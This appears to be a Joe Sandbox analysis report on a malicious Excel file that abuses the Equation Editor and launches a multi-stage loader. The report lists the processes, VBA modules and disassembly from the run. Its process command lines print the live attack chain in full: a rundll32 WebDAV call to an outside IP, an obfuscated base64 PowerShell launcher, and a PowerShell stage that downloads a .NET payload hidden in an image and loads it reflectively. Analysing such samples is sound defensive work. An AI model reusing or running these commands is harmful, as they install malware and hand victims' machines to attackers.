2024-02-13 14:08:05 UTC	1369	IN	Data Raw: e1 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 ee a4 24 f2 79 3c 9a 6b f4 14 d4 62 a7 Data Ascii: oU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F21Fi!hWQ@FE MsWCyU$y<kb
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 38 ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 45 56 e0 e7 b0 e4 fa 72 28 3c 01 eb 49 Data Ascii: 88^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`\|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+EVr(<I
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 6a e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 f7 c6 4d 1d e9 ac 79 a2 e5 d8 0b 64 fa Data Ascii: jUxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0iMyd
2024-02-13 14:08:05 UTC	1369	IN	Data Raw: 53 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 56 a6 d6 2c 69 53 ef 52 25 c4 ab 11 8c Data Ascii: SwJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>\|Oi6n;cJCn,[)V,iSR%

Target ID:	0
Start time:	15:06:59
Start date:	13/02/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f0e0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:07:49
Start date:	13/02/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13fc20000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:07:54
Start date:	13/02/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO
Imagebase:	0xff250000
File size:	45'568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:07:59
Start date:	13/02/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:08:00
Start date:	13/02/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs"
Imagebase:	0x3c0000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:08:02
Start date:	13/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTwBFDgTreEwDgTreLwBPDgTreEUDgTreTDgTreDgTrevDgTreDYDgTreOQDgTreuDgTreDQDgTreNDgTreDgTreyDgTreC4DgTreMgDgTre5DgTreC4DgTreMQDgTre5DgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBMDgTreEUDgTreTwDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
Imagebase:	0x1370000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:08:02
Start date:	13/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }
Imagebase:	0x1370000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:08:08
Start date:	13/02/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0x12a0000
File size:	2'525'680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:08:43
Start date:	13/02/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Imagebase:	0xe60000
File size:	9'805'808 bytes
MD5 hash:	326A645391A97C760B60C558A35BB068
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1668, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	58.3%
Total number of Nodes:	72
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03530629 Relevance: 4.6, APIs: 3, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(0353061B), ref: 03530629
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035306E2
ExitProcess.KERNEL32(00000000), ref: 035306FA

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitLibraryLoadProcessShell
String ID:
API String ID: 2383344257-0
Opcode ID: 84ca0dd69d8695891aecc1501d7e613b52a1f0d5e5aabe8d5c9462662c784e71
Instruction ID: 8e25fd6fbe843d5a23058422ca0f2c3fa4d7d3dbd1f1cd7e49ceabc8dc00f995
Opcode Fuzzy Hash: 84ca0dd69d8695891aecc1501d7e613b52a1f0d5e5aabe8d5c9462662c784e71
Instruction Fuzzy Hash: D5215C9298D7C12FE713D7305C7AB65BF646F93204F5989CED0C30A4E3E6585405C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 035306A2 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03530654,?,00000000,00000000), ref: 035306A4

Part of subcall function 035306BB: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035306E2
Part of subcall function 035306BB: ExitProcess.KERNEL32(00000000), ref: 035306FA

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
